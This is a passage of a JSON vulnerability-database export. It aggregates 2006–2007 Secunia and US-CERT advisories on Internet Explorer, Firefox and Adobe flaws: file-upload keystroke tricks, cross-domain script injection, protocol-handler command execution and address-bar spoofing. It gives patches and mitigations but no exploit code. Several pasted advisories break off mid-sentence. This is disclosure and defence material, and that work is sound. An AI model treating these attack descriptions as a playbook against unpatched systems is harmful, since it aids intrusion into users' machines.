"author": "CARNEGIE MELLON",
"id": "VU#403150",
"trust": 0.8,
"value": "18.43"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#783400",
"trust": 0.8,
"value": "25.52"
},
{
"author": "CNNVD",
"id": "CNNVD-200606-183",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-19008",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#143297"
},
{
"db": "CERT/CC",
"id": "VU#403150"
},
{
"db": "CERT/CC",
"id": "VU#783400"
},
{
"db": "VULHUB",
"id": "VHN-19008"
},
{
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Internet Explorer 6 allows user-assisted remote attackers to read arbitrary files by tricking a user into typing the characters of the target filename in a text box and using the OnKeyDown, OnKeyPress, and OnKeyUp Javascript keystroke events to change the focus and cause those characters to be inserted into a file upload input control, which can then upload the file when the user submits the form. Mozilla Firefox allows cross-domain access to an iframe. This vulnerability could allow an attacker to interact with a web site in a different domain. The attacker could read content and cookies, capture keystrokes, and modify content. Mozilla Firefox does not filter input when sending certain URIs to registered protocol handlers. This may allow a remote, authenticated attacker to use Firefox as a vector for executing commands on a vulnerable system. \n\n----------------------------------------------------------------------\n\nWant to join the Secunia Security Team?\n\nSecunia offers a position as a security specialist, where your daily\nwork involves reverse engineering of software and exploit code,\nauditing of source code, and analysis of vulnerability reports. \n\nSOLUTION:\nDisable Active Scripting support. \n\nDo not enter suspicious text when visiting untrusted web sites. \n\n----------------------------------------------------------------------\n\nTry a new way to discover vulnerabilities that ALREADY EXIST in your\nIT infrastructure. \n\nThe Full Featured Secunia Network Software Inspector (NSI) is now\navailable:\nhttp://secunia.com/network_software_inspector/\n\nThe Secunia NSI enables you to INSPECT, DISCOVER, and DOCUMENT\nvulnerabilities in more than 4,000 different Windows applications. \n\n----------------------------------------------------------------------\n\nTITLE:\nMozilla Firefox Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA26095\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/26095/\n\nCRITICAL:\nHighly critical\n\nIMPACT:\nCross Site Scripting, Spoofing, DoS, System access\n\nWHERE:\n\u003eFrom remote\n\nSOFTWARE:\nMozilla Firefox 2.0.x\nhttp://secunia.com/product/12434/\n\nDESCRIPTION:\nSome vulnerabilities have been reported in Mozilla Firefox, which can\nbe exploited by malicious people to conduct spoofing and cross-site\nscripting attacks and potentially to compromise a user\u0027s system. \n\n1) Various errors in the browser engine can be exploited to cause\nmemory corruption and potentially to execute arbitrary code. \n\n2) Various errors in the Javascript engine can be exploited to cause\nmemory corruption and potentially to execute arbitrary code. \n\n3) An error in the \"addEventListener\" and \"setTimeout\" methods can be\nexploited to inject script into another site\u0027s context, circumventing\nthe browser\u0027s same-origin policy. \n\n4) An error in the cross-domain handling can be exploited to inject\narbitrary HTML and script code in a sub-frame of another web site. \n\nThis is related to vulnerability #5 in:\nSA21906\n\n5) An unspecified error in the handling of elements outside of\ndocuments allows an attacker to call an event handler and execute\narbitrary code with chrome privileges. \n\n6) An unspecified error in the handling of \"XPCNativeWrapper\" can\nlead to execution of user-supplied code. \n\nSOLUTION:\nUpdate to version 2.0.0.5. \n\nPROVIDED AND/OR DISCOVERED BY:\n1) The vendor credits Bernd Mielke, Boris Zbarsky, David Baron,\nDaniel Veditz, Jesse Ruderman, Lukas Loehrer, Martijn Wargers, Mats\nPalmgren, Olli Pettay, Paul Nickerson, and Vladimir Sukhoy. \n2) The vendor credits Asaf Romano, Jesse Ruderman, and Igor Bukanov. \n3, 5) The vendor credits moz_bug_r_a4\n4) Ronen Zilberman and Michal Zalewski\n6) The vendor credits shutdown and moz_bug_r_a4. \n\nORIGINAL ADVISORY:\nhttp://www.mozilla.org/security/announce/2007/mfsa2007-18.html\nhttp://www.mozilla.org/security/announce/2007/mfsa2007-19.html\nhttp://www.mozilla.org/security/announce/2007/mfsa2007-20.html\nhttp://www.mozilla.org/security/announce/2007/mfsa2007-21.html\nhttp://www.mozilla.org/security/announce/2007/mfsa2007-25.html\n\nOTHER REFERENCES:\nSA21906:\nhttp://secunia.com/advisories/21906/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n\n----------------------------------------------------------------------\n\nBETA test the new Secunia Personal Software Inspector!\n\nThe Secunia PSI detects installed software on your computer and\ncategorises it as either Insecure, End-of-Life, or Up-To-Date. \nEffectively enabling you to focus your attention on software\ninstallations where more secure versions are available from the\nvendors. \n\nThe vulnerability is caused due to an error within the handling of\n\"about:blank\" pages loaded by chrome in an addon. This can be\nexploited to execute script code under chrome privileges by e.g. \nclicking on a link opened in an \"about:blank\" window created and\npopulated in a certain ways by an addon. \n\nSuccessful exploitation requires that certain addons are installed. \nhttp://www.mozilla.com/en-US/firefox/\n\nThunderbird:\nFixed in the upcoming version 2.0.0.6. \nhttp://www.mozilla.com/en-US/thunderbird/\n\nSeaMonkey:\nFixed in the upcoming version 1.1.4. \n\nFor more information:\nSA26201\n\nPROVIDED AND/OR DISCOVERED BY:\nmoz_bug_r_a4\n\nCHANGELOG:\n2007-07-31: Updated \"Description\". Added link to vendor advisory. \"mailto\", \"news\", \"nntp\", \"snews\", \"telnet\"). using\nFirefox visits a malicious website with a specially crafted \"mailto\"\nURI containing a \"%\" character and ends in a certain extension (e.g. \n\nThe vulnerability is confirmed on a fully patched Windows XP SP2 and\nWindows Server 2003 SP2 system using Firefox version 2.0.0.5 and\nNetscape Navigator version 9.0b2. Other versions and browsers may\nalso be affected. \n\nSOLUTION:\nDo not browse untrusted websites or follow untrusted links. \n\nPROVIDED AND/OR DISCOVERED BY:\nVulnerability discovered by:\n* Billy (BK) Rios\n\nFirefox not escaping quotes originally discussed by:\n* Jesper Johansson\n\nAdditional research by Secunia Research. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\tNational Cyber Alert System\n Technical Cyber Security Alert TA07-297B\n\n\nAdobe Updates for Microsoft Windows URI Vulnerability\n\n Original release date: October 24, 2007\n Last revised: --\n Source: US-CERT\n\nSystems Affected\n\n Microsoft Windows XP and Windows Server 2003 systems with Internet\n Explorer 7 and any of the following Adobe products:\n * Adobe Reader 8.1 and earlier\n * Adobe Acrobat Professional, 3D, and Standard 8.1 and earlier\n * Adobe Reader 7.0.9 and earlier\n * Adobe Acrobat Professional, 3D, Standard, and Elements 7.0.9 and\n earlier\n\nOverview\n\n Adobe has released updates for the Adobe Reader and Adobe Acrobat\n product families. The update addresses a URI handling vulnerability in\n Microsoft Windows XP and Server 2003 systems with Internet Explorer 7. \n\nI. Description\n\n Installing Microsoft Internet Explorer (IE) 7 on Windows XP or Server\n 2003 changes the way Windows handles Uniform Resource Identifiers\n (URIs). This change has introduced a flaw that can cause Windows to\n incorrectly determine the appropriate handler for the protocol\n specified in a URI. More information about this vulnerability is available in\n US-CERT Vulnerability Note VU#403150. \n\n Public reports indicate that this vulnerability is being actively\n exploited with malicious PDF files. Adobe has released Adobe Reader\n 8.1.1 and Adobe Acrobat 8.1.1, which mitigate this vulnerability. \n\nII. \n\nIII. Solution\n\nApply an update\n\n Adobe has released Adobe Reader 8.1.1 and Adobe Acrobat 8.1.1 to\n address this issue. These Adobe products handle URIs in a way that\n mitigates the vulnerability in Microsoft Windows. \n\nDisable the mailto: URI in Adobe Reader and Adobe Acrobat\n\n If you are unable to install an updated version of the software, this\n vulnerability can be mitigated by disabling the mailto: URI handler in\n Adobe Reader and Adobe Acrobat. Please see Adobe Security Bulletin\n APSB07-18 for details. \n\n\nAppendix A. Vendor Information\n\nAdobe\n\n For information about updating affected Adobe products, see Adobe\n Security Bulletin APSB07-18. \n\nAppendix B. References\n\n * Adobe Security Bulletin APSB07-18 -\n \u003chttp://www.adobe.com/support/security/bulletins/apsb07-18.htm\u003e\n \n * Microsoft Security Advisory (943521) -\n \u003chttp://www.microsoft.com/technet/security/advisory/943521.mspx\u003e\n \n * US-CERT Vulnerability Note VU#403150 -\n \u003chttp://www.kb.cert.org/vuls/id/403150\u003e\n\n _________________________________________________________________\n\n The most recent version of this document can be found at:\n\n \u003chttp://www.us-cert.gov/cas/techalerts/TA07-297B.html\u003e\n _________________________________________________________________\n\n Feedback can be directed to US-CERT Technical Staff. Please send\n email to \u003ccert@cert.org\u003e with \"TA07-297B Feedback VU#403150\" in the\n subject. \n _________________________________________________________________\n \n For instructions on subscribing to or unsubscribing from this\n mailing list, visit \u003chttp://www.us-cert.gov/cas/signup.html\u003e. \n _________________________________________________________________\n\n Produced 2007 by US-CERT, a government organization. \n\n Terms of use:\n\n \u003chttp://www.us-cert.gov/legal.html\u003e\n _________________________________________________________________\n\nRevision History\n\n October 24, 2007: Initial release\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niQEVAwUBRx+8WPRFkHkM87XOAQIrOQf/USsBbfDmKZ4GCi8W2466mI+kZoEHoe/H\n3l3p4/1cuFGoPHFfeDLbG+alXiHSAdXoX7Db34InEUKMs7kRUVPEdW9LggI9VaTJ\nlKnZJxM3dXL+zPCWcDkNqrmmzyJuXwN5FmSXhlcnN4+FRzNrZYwDe1UcOk3q6m1s\nVNPIBTrqfSuFRllNt+chV1vQ876LLweS+Xh1DIQ/VIyduqvTogoYZO4p2A0YJD57\n4y0obNuk+IhgzyhZHtSsR0ql7rGrFr4S97XUQGbKOAZWcDzNGiXJ5FkrMTaP25OI\nLazBVDofVz8ydUcEkb4belgv5REpfYUJc9hRbRZ+IpbAay2j42m8NQ==\n=PgB9\n-----END PGP SIGNATURE-----\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"db": "CERT/CC",
"id": "VU#143297"
},
{
"db": "CERT/CC",
"id": "VU#403150"
},
{
"db": "CERT/CC",
"id": "VU#783400"
},
{
"db": "VULHUB",
"id": "VHN-19008"
},
{
"db": "PACKETSTORM",
"id": "47071"
},
{
"db": "PACKETSTORM",
"id": "57832"
},
{
"db": "PACKETSTORM",
"id": "58191"
},
{
"db": "PACKETSTORM",
"id": "58068"
},
{
"db": "PACKETSTORM",
"id": "60418"
}
],
"trust": 3.6
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "SECUNIA",
"id": "26201",
"trust": 1.8
},
{
"db": "SECUNIA",
"id": "20449",
"trust": 1.8
},
{
"db": "BID",
"id": "18308",
"trust": 1.7
},
{
"db": "SREASON",
"id": "1059",
"trust": 1.7
},
{
"db": "VUPEN",
"id": "ADV-2006-2161",
"trust": 1.7
},
{
"db": "NVD",
"id": "CVE-2006-2900",
"trust": 1.7
},
{
"db": "SECUNIA",
"id": "26288",
"trust": 0.9
},
{
"db": "SECUNIA",
"id": "26095",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#403150",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#783400",
"trust": 0.9
},
{
"db": "CERT/CC",
"id": "VU#143297",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-200606-183",
"trust": 0.7
},
{
"db": "FULLDISC",
"id": "20060605 FILE UPLOAD WIDGETS IN IE AND FIREFOX HAVE ISSUES",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-19008",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "47071",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "57832",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "58191",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "58068",
"trust": 0.1
},
{
"db": "USCERT",
"id": "TA07-297B",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "60418",
"trust": 0.1
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#143297"
},
{
"db": "CERT/CC",
"id": "VU#403150"
},
{
"db": "CERT/CC",
"id": "VU#783400"
},
{
"db": "VULHUB",
"id": "VHN-19008"
},
{
"db": "PACKETSTORM",
"id": "47071"
},
{
"db": "PACKETSTORM",
"id": "57832"
},
{
"db": "PACKETSTORM",
"id": "58191"
},
{
"db": "PACKETSTORM",
"id": "58068"
},
{
"db": "PACKETSTORM",
"id": "60418"
},
{
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"id": "VAR-200606-0464",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-19008"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T11:05:26.386000Z",
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-200",
"trust": 1.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-19008"
},
{
"db": "NVD",
"id": "CVE-2006-2900"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.8,
"url": "http://secunia.com/advisories/26201/"
},
{
"trust": 1.7,
"url": "http://xs-sniper.com/blog/2007/07/24/remote-command-execution-in-firefox-2005/"
},
{
"trust": 1.7,
"url": "http://www.securityfocus.com/bid/18308"
},
{
"trust": 1.7,
"url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-june/046610.html"
},
{
"trust": 1.7,
"url": "http://secunia.com/advisories/20449"
},
{
"trust": 1.7,
"url": "http://securityreason.com/securityalert/1059"
},
{
"trust": 1.6,
"url": "http://xs-sniper.com/blog/remote-command-exec-firefox-2005/"
},
{
"trust": 1.6,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=389580"
},
{
"trust": 1.6,
"url": "http://support.microsoft.com/kb/224816"
},
{
"trust": 1.6,
"url": "http://kb.mozillazine.org/firefox_:_faqs_:_about:config_entries"
},
{
"trust": 1.6,
"url": "http://en.wikipedia.org/wiki/uniform_resource_identifier"
},
{
"trust": 1.1,
"url": "http://www.vupen.com/english/advisories/2006/2161"
},
{
"trust": 0.9,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-20.html"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/26095/"
},
{
"trust": 0.9,
"url": "http://secunia.com/advisories/26288/"
},
{
"trust": 0.8,
"url": "http://archives.neohapsis.com/archives/fulldisclosure/2007-06/0026.html"
},
{
"trust": 0.8,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=382686"
},
{
"trust": 0.8,
"url": "http://www.w3schools.com/tags/tag_iframe.asp"
},
{
"trust": 0.8,
"url": "http://www.w3.org/tr/html401/present/frames.html#h-16.5"
},
{
"trust": 0.8,
"url": "https://addons.mozilla.org/en-us/firefox/addon/722"
},
{
"trust": 0.8,
"url": "http://www.mozilla.org/projects/security/components/same-origin.html"
},
{
"trust": 0.8,
"url": "http://www.cert.org/archive/pdf/cross_site_scripting.pdf"
},
{
"trust": 0.8,
"url": "http://www.stopbadware.org/home/security#preventing"
},
{
"trust": 0.8,
"url": "http://www.antiphishing.org/consumer_recs.html"
},
{
"trust": 0.8,
"url": "http://www.us-cert.gov/reading_room/securing_browser/"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/bulletin/ms07-061.mspx"
},
{
"trust": 0.8,
"url": "http://www.microsoft.com/technet/security/advisory/943521.mspx"
},
{
"trust": 0.8,
"url": "http://blogs.technet.com/msrc/archive/2007/10/25/msrc-blog-october-25th-update-to-security-advisory-943521.aspx"
},
{
"trust": 0.8,
"url": "http://www.adobe.com/support/security/advisories/apsa07-04.html"
},
{
"trust": 0.8,
"url": "http://www.adobe.com/support/security/bulletins/apsb07-18.html"
},
{
"trust": 0.8,
"url": "http://en-us.www.mozilla.com/en-us/firefox/2.0.0.6/releasenotes/"
},
{
"trust": 0.8,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=389106"
},
{
"trust": 0.8,
"url": "http://www.w3schools.com/tags/ref_urlencode.asp"
},
{
"trust": 0.6,
"url": "http://www.frsirt.com/english/advisories/2006/2161"
},
{
"trust": 0.4,
"url": "http://secunia.com/secunia_security_advisories/"
},
{
"trust": 0.4,
"url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
},
{
"trust": 0.4,
"url": "http://secunia.com/about_secunia_advisories/"
},
{
"trust": 0.2,
"url": "http://secunia.com/network_software_inspector/"
},
{
"trust": 0.2,
"url": "http://secunia.com/product/12434/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/20449/"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/20442/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/11/"
},
{
"trust": 0.1,
"url": "http://secunia.com/secunia_security_specialist/"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-18.html"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-25.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/advisories/21906/"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-19.html"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-21.html"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/projects/seamonkey/"
},
{
"trust": 0.1,
"url": "http://www.mozilla.com/en-us/firefox/"
},
{
"trust": 0.1,
"url": "https://psi.secunia.com/"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-27.html"
},
{
"trust": 0.1,
"url": "http://www.mozilla.com/en-us/thunderbird/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14383/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/14070/"
},
{
"trust": 0.1,
"url": "https://bugzilla.mozilla.org/show_bug.cgi?id=388121"
},
{
"trust": 0.1,
"url": "http://www.mozilla.org/security/announce/2007/mfsa2007-26.html"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1173/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/22/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1174/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1176/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/1175/"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/783400"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/16/"
},
{
"trust": 0.1,
"url": "http://secunia.com/product/12366/"
},
{
"trust": 0.1,
"url": "http://msinfluentials.com/blogs/jesper/archive/2007/07/20/hey-mozilla-quotes-are-not-legal-in-a-url.aspx"
},
{
"trust": 0.1,
"url": "http://www.adobe.com/support/security/bulletins/apsb07-18.htm\u003e"
},
{
"trust": 0.1,
"url": "http://www.microsoft.com/technet/security/advisory/943521.mspx\u003e"
},
{
"trust": 0.1,
"url": "http://www.kb.cert.org/vuls/id/403150\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/signup.html\u003e."
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/legal.html\u003e"
},
{
"trust": 0.1,
"url": "http://www.us-cert.gov/cas/techalerts/ta07-297b.html\u003e"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#143297"
},
{
"db": "CERT/CC",
"id": "VU#403150"
},
{
"db": "CERT/CC",
"id": "VU#783400"
},
{
"db": "VULHUB",
"id": "VHN-19008"
},
{
"db": "PACKETSTORM",
"id": "47071"
},
{
"db": "PACKETSTORM",
"id": "57832"
},
{
"db": "PACKETSTORM",
"id": "58191"
},
{
"db": "PACKETSTORM",
"id": "58068"
},
{
"db": "PACKETSTORM",
"id": "60418"
},
{
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CERT/CC",
"id": "VU#143297"
},
{
"db": "CERT/CC",
"id": "VU#403150"
},
{
"db": "CERT/CC",
"id": "VU#783400"
},
{
"db": "VULHUB",
"id": "VHN-19008"
},
{
"db": "PACKETSTORM",
"id": "47071"
},
{
"db": "PACKETSTORM",
"id": "57832"
},
{
"db": "PACKETSTORM",
"id": "58191"
},
{
"db": "PACKETSTORM",
"id": "58068"
},
{
"db": "PACKETSTORM",
"id": "60418"
},
{
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2007-06-08T00:00:00",
"db": "CERT/CC",
"id": "VU#143297"
},
{
"date": "2007-07-27T00:00:00",
"db": "CERT/CC",
"id": "VU#403150"
},
{
"date": "2007-07-26T00:00:00",
"db": "CERT/CC",
"id": "VU#783400"
},
{
"date": "2006-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-19008"
},
{
"date": "2006-06-10T05:36:59",
"db": "PACKETSTORM",
"id": "47071"
},
{
"date": "2007-07-19T02:44:59",
"db": "PACKETSTORM",
"id": "57832"
},
{
"date": "2007-08-01T00:35:42",
"db": "PACKETSTORM",
"id": "58191"
},
{
"date": "2007-07-27T03:17:23",
"db": "PACKETSTORM",
"id": "58068"
},
{
"date": "2007-10-25T04:18:19",
"db": "PACKETSTORM",
"id": "60418"
},
{
"date": "2006-06-07T16:02:00",
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"date": "2006-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2008-03-14T00:00:00",
"db": "CERT/CC",
"id": "VU#143297"
},
{
"date": "2007-11-13T00:00:00",
"db": "CERT/CC",
"id": "VU#403150"
},
{
"date": "2007-07-31T00:00:00",
"db": "CERT/CC",
"id": "VU#783400"
},
{
"date": "2011-10-11T00:00:00",
"db": "VULHUB",
"id": "VHN-19008"
},
{
"date": "2011-10-11T04:00:00",
"db": "NVD",
"id": "CVE-2006-2900"
},
{
"date": "2006-08-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Mozilla Firefox allows cross-domain iframe access via JavaScript",
"sources": [
{
"db": "CERT/CC",
"id": "VU#143297"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "information disclosure",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200606-183"
}
],
"trust": 0.6
}
}
VAR-200604-0205
Vulnerability from variot - Updated: 2023-12-18 11:04Microsoft Internet Explorer 5.01 through 6 allows remote attackers to conduct phishing attacks by spoofing the address bar and other parts of the trust UI via unknown methods that allow "window content to persist" after the user has navigated to another site, aka the "Address Bar Spoofing Vulnerability." NOTE: this is a different vulnerability than CVE-2006-1626. Microsoft Internet Explorer is prone to address-bar spoofing. Attackers may exploit this via a malicious web page to spoof the contents of a page that the victim may trust. This vulnerability may be useful in phishing or other attacks that rely on content spoofing.
TITLE: Internet Explorer Multiple Vulnerabilities
SECUNIA ADVISORY ID: SA18957
VERIFY ADVISORY: http://secunia.com/advisories/18957/
CRITICAL: Highly critical
IMPACT: Spoofing, System access, Cross Site Scripting
WHERE:
From remote
SOFTWARE: Microsoft Internet Explorer 5.5 http://secunia.com/product/10/ Microsoft Internet Explorer 5.01 http://secunia.com/product/9/ Microsoft Internet Explorer 6.x http://secunia.com/product/11/
DESCRIPTION: Multiple vulnerabilities have been reported in Internet Explorer, which can be exploited by malicious people to conduct cross-site scripting attacks, conduct phishing attacks, or compromise a user's system.
1) An error in the cross-domain restriction when accessing properties of certain dynamically created objects can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an arbitrary site via a JavaScript URI handler applied on a dynamically created "object" tag.
2) An error within the handling of multiple event handlers (e.g. onLoad) in an HTML element can be exploited to corrupt memory in a way that may allow execution of arbitrary code.
3) An error within the parsing of specially crafted, non-valid HTML can be exploited to corrupt memory in a way that allows execution of arbitrary code when a malicious HTML document is viewed.
4) An error within the instantiation of COM objects that are not intended to be instantiated in Internet Explorer can be exploited to corrupt memory in a way that allows execution of arbitrary code.
5) An error within the handling of HTML elements containing a specially crafted tag can be exploited to corrupt memory in a way that allows execution of arbitrary code.
6) An error within the handling of double-byte characters in specially crafted URLs can be exploited to corrupt memory in a way that allows execution of arbitrary code.
Successful exploitation requires that the system uses double-byte character sets.
7) An error in the way IOleClientSite information is returned when an embedded object is dynamically created can be exploited to execute arbitrary code in context of another site or security zone.
8) An unspecified error can be exploited to spoof information displayed in the address bar and other parts of the trust UI.
9) Some unspecified vulnerabilities exist in the two ActiveX controls included with Danim.dll and Dxtmsft.dll.
SOLUTION: Apply patches.
Internet Explorer 5.01 SP4 on Windows 2000 SP4: http://www.microsoft.com/downloa...7B87-AF8F-4346-9164-596E3E5C22B1
Internet Explorer 6 SP1 on Windows 2000 SP4 or Windows XP SP1: http://www.microsoft.com/downloa...41E1-2B36-4696-987A-099FC57E0129
Internet Explorer 6 for Windows XP SP2: http://www.microsoft.com/downloa...FB31-E6B4-4771-81F1-4ACCEBF72133
Internet Explorer 6 for Windows Server 2003 and Windows Server 2003 SP1: http://www.microsoft.com/downloa...6871-D217-41D3-BECC-B27FAFA00054
Internet Explorer 6 for Windows Server 2003 for Itanium-based systems and Windows Server 2003 with SP1 for Itanium-based systems: http://www.microsoft.com/downloa...957C-0ABE-4129-ABAF-AA2852AD62A3
Internet Explorer 6 for Windows Server 2003 x64 Edition: http://www.microsoft.com/downloa...8BE3-39EE-4937-9BD1-280FC35125C6
Internet Explorer 6 for Windows XP Professional x64 Edition: http://www.microsoft.com/downloa...FE3E-620A-4BBC-868B-CA2D9EFF7AC3
Internet Explorer 6 SP1 on Windows 98, Windows 98 SE, or Windows ME: Patches are available via the Microsoft Update Web site or the Windows Update Web site.
PROVIDED AND/OR DISCOVERED BY: 1) Discovered by anonymous person. 2) Michal Zalewski 3) The vendor credits Jan P. Monsch, Compass Security Network Computing. 4) The vendor credits Richard M. Smith, Boston Software Forensics. 5) The vendor credits Thomas Waldegger. 6) The vendor credits Sowhat, Nevis Labs. 7) The vendor credits Heiko Schultze, SAP. 9) The vendor credits Will Dormann, CERT/CC.
ORIGINAL ADVISORY: MS06-013 (KB912812): http://www.microsoft.com/technet/security/Bulletin/MS06-013.mspx
About: This Advisory was delivered by Secunia as a free service to help everybody keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
